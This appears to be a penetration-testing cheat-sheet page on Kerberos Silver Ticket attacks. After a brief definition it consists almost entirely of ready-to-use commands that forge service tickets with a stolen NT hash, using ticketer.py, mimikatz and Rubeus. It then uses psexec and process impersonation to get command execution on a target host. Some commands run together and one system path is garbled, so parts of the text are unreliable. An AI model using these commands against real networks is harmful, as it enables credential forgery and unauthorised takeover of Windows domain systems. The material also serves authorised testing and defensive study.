Silver Tickets
A Silver Ticket is a custom Service Ticket that allows any domain user to gain access to any service on a computer.
An attacker can create a Service Ticket using any arbitrary domain account, a target SPN, and a forged Privilege Attribute Certificate (PAC) that states that the arbitrary domain user has full access to the service.
Exploit
## Create A Silver Ticket Using the NT Hash of the Target Account and Target SPN
ticketer.py -nthash [nt hash] -domain-sid [domain sid] -domain [domain] -spn cifs/computer.weelee.zip weelee
## Set Obtained .ccache to Kerberos Credential Cache
export KRB5CCNAME=[path to .ccache]
## Use Your Exec Tool of Choice to Access Your Specific Service
psexec.py [domain]/[username]@[computer] -k -no-pass## Run Mimikatz.exe
Mimikatz.exe
## Create Silver Ticket And Inject The Ticket Into The Current Process
kerberos::golden /domain:weelee.zip /sid:[domain sid] /rc4:[nt hash] /service:cifs /target:computer.weelee.zip /user:weelee /ptt
## Use Your Exec Tool Of Choice To Access Your Specific Service
PSexec.exe -accepteula \\computer.weelee.zip cmd## Create A Silver Ticket And Inject It Into The Current Process
Rubeus.exe silver /service:cifs/computer.weelee.zip /rc4:[nt hash] /user:weelee /domain:weelee.zip /sid:[domain sid] /nowrap /ptt
## Use Your Exec Tool Of Choice To Access Your Specific Service
PSexec.exe -accepteula \\computer.weelee.zip cmd
OR
## Create A Silver Ticket
Rubeus.exe silver /service:cifs/dc.weelee.zip /rc4:[nt hash] /user:weelee /domain:weelee.zip /sid:[domain sid] /nowrap
## Create A New Process And Inject The Silver Ticket Into It (User/Pass Can Be Anything)
Rubeus.exe createnetonly /program:C:\Windows\System32.cmd.exe /domain:weelee.zip /username:weelee /password:anypassword /ticket:[previous command output]
## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"Last updated